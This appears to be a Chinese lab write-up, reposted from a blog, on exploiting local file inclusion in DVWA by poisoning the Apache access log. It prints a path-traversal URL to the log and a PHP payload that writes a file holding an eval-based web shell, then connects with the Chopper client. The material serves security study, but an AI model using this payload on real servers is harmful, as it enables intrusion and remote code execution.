漏洞复现篇——文件包含漏洞进阶-日志文件漏洞

日志文件漏洞原理
当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。
Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中
例如:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log

实验环境:

环境配置:

打开Apache的配置文件

在这里插入图片描述

搜索CustomLog "logs/access.log" common将前面的注释去掉,然后重启PHPstudy
在这里插入图片描述

模拟实验:

1、在当前网页抓包

在这里插入图片描述

2、发送到Repeater模块

在这里插入图片描述

3、将url改为<?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>然后点击GO

在这里插入图片描述

4、访问C:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log路径,如下图成功执行

在这里插入图片描述

5、在fi下输入c.php?666=phpinfo();成功执行

在这里插入图片描述

6、复制url使用菜刀连接

在这里插入图片描述
在这里插入图片描述

发布了64 篇原创文章 · 获赞 500 · 访问量 8万+

猜你喜欢

转载自blog.csdn.net/weixin_45728976/article/details/104401341